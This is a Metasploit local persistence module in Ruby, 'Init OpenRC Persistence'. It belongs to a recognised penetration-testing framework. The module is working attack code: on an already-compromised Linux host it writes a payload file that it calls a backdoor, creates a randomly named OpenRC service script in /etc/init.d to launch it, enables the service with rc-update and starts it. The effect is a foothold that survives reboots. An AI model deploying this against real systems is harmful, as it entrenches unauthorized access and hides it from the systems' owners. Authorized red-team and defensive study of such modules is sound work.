1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Exploit::Local
7
  Rank = ExcellentRanking
8

9
  include Msf::Post::File
10
  include Msf::Post::Unix
11
  include Msf::Exploit::FileDropper
12
  include Msf::Exploit::EXE # for generate_payload_exe
13
  include Msf::Exploit::Local::Persistence
14
  prepend Msf::Exploit::Remote::AutoCheck
15
  include Msf::Exploit::Deprecated
16
  moved_from 'exploits/linux/local/service_persistence'
17

18
  def initialize(info = {})
19
    super(
20
      update_info(
21
        info,
22
        'Name' => 'Init OpenRC Persistence',
23
        'Description' => %q{
24
          This module will create a service on the box via OpenRC, and mark it for auto-restart.
25
          We need enough access to write service files and potentially restart services.
26
          Verified against alpine 3.21.2
27
        },
28
        'License' => MSF_LICENSE,
29
        'Author' => [
30
          'h00die',
31
        ],
32
        'Platform' => ['unix', 'linux'],
33
        'Targets' => [
34
          ['Automatic', {}]
35
        ],
36
        'DefaultTarget' => 0,
37
        'Arch' => [
38
          ARCH_CMD,
39
          ARCH_X86,
40
          ARCH_X64,
41
          ARCH_ARMLE,
42
          ARCH_AARCH64,
43
          ARCH_PPC,
44
          ARCH_MIPSLE,
45
          ARCH_MIPSBE
46
        ],
47
        'References' => [
48
          ['URL', 'https://www.digitalocean.com/community/tutorials/how-to-configure-a-linux-service-to-start-automatically-after-a-crash-or-reboot-part-1-practical-examples'],
49
          ['ATT&CK', Mitre::Attack::Technique::T1543_CREATE_OR_MODIFY_SYSTEM_PROCESS],
50
          ['ATT&CK', Mitre::Attack::Technique::T1546_EVENT_TRIGGERED_EXECUTION],
51
          ['URL', 'https://wiki.alpinelinux.org/wiki/Writing_Init_Scripts'],
52
          ['URL', 'https://wiki.alpinelinux.org/wiki/OpenRC'],
53
          ['URL', 'https://github.com/OpenRC/openrc/blob/master/service-script-guide.md'],
54
        ],
55
        'SessionTypes' => ['shell', 'meterpreter'],
56
        'Notes' => {
57
          'Stability' => [CRASH_SAFE],
58
          'Reliability' => [REPEATABLE_SESSION, EVENT_DEPENDENT],
59
          'SideEffects' => [ARTIFACTS_ON_DISK, CONFIG_CHANGES]
60
        },
61
        'DisclosureDate' => '2007-04-05' # openrc release date
62
      )
63
    )
64

65
    register_options(
66
      [
67
        OptString.new('SERVICE', [false, 'Name of service to create']),
68
        OptString.new('PAYLOAD_NAME', [false, 'Name of the payload file to write']),
69
      ]
70
    )
71
    register_advanced_options(
72
      [
73
        OptBool.new('EnableService', [true, 'Enable the service', true])
74
      ]
75
    )
76
  end
77

78
  def check
79
    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')
80
    return CheckCode::Safe("#{writable_dir} doesnt exist") unless exists?(writable_dir)
81
    return CheckCode::Safe("#{writable_dir} isnt writable") unless writable?(writable_dir)
82
    return CheckCode::Safe('/etc/init.d/ doesnt exist') unless exists?('/etc/init.d/')
83
    return CheckCode::Safe('/etc/init.d/ isnt writable') unless writable?('/etc/init.d/')
84

85
    return CheckCode::Safe('Likely not an openrc based system') unless command_exists?('openrc')
86

87
    CheckCode::Appears("#{writable_dir} is writable and system is openrc based")
88
  end
89

90
  def install_persistence
91
    print_warning('Payloads in /tmp will only last until reboot, you want to choose elsewhere.') if writable_dir.start_with?('/tmp')
92
    backdoor = write_shell(writable_dir)
93

94
    path = backdoor.split('/')[0...-1].join('/')
95
    file = backdoor.split('/')[-1]
96

97
    openrc(path, file)
98
  end
99

100
  def write_shell(path)
101
    file_name = datastore['PAYLOAD_NAME'] || Rex::Text.rand_text_alpha(5..10)
102
    backdoor = "#{path}/#{file_name}"
103
    vprint_status("Writing backdoor to #{backdoor}")
104

105
    if payload.arch.first == 'cmd'
106
      write_file(backdoor, payload.encoded)
107
      chmod(backdoor, 0o755)
108
    else
109
      upload_and_chmodx(backdoor, generate_payload_exe)
110
    end
111

112
    @clean_up_rc << "rm #{backdoor}\n"
113

114
    fail_with(Failure::NoAccess, 'File not written, check permissions.') unless file_exist?(backdoor)
115
    backdoor
116
  end
117

118
  def openrc(backdoor_path, backdoor_file)
119
    if payload.arch.first == 'cmd'
120
      script = %(#!/sbin/openrc-run
121
name=#{backdoor_file}
122
command=/bin/sh
123
command_args="#{backdoor_path}/#{backdoor_file}"
124
pidfile="/run/${RC_SVCNAME}.pid"
125
command_background="yes"
126
)
127
    else
128
      script = %(#!/sbin/openrc-run
129
name=#{backdoor_file}
130
command="#{backdoor_path}/#{backdoor_file}"
131
command_args=""
132
pidfile="/run/${RC_SVCNAME}.pid"
133
command_background="yes"
134
)
135
    end
136

137
    service_filename = datastore['SERVICE'] || Rex::Text.rand_text_alpha(7..12)
138
    service_path = "/etc/init.d/#{service_filename}"
139
    vprint_status("Writing service: #{service_path}")
140
    begin
141
      upload_and_chmodx(service_path, script)
142
      @clean_up_rc << "rm #{service_path}\n"
143
    rescue Rex::Post::Meterpreter::RequestError
144
      print_error("Writing '#{service_path}' to the target and or changing the file permissions failed")
145
    end
146

147
    fail_with(Failure::NoAccess, 'Service file not written, check permissions.') unless file_exist?(service_path)
148

149
    if datastore['EnableService']
150
      vprint_status('Enabling service')
151
      cmd_exec("rc-update add '#{service_filename}'")
152
      @clean_up_rc << "execute -f sh -a \"-c 'rc-update del #{service_filename}'\""
153
    end
154

155
    print_good('Starting service')
156
    cmd_exec("'#{service_path}' start")
157
  end
158
end
159

160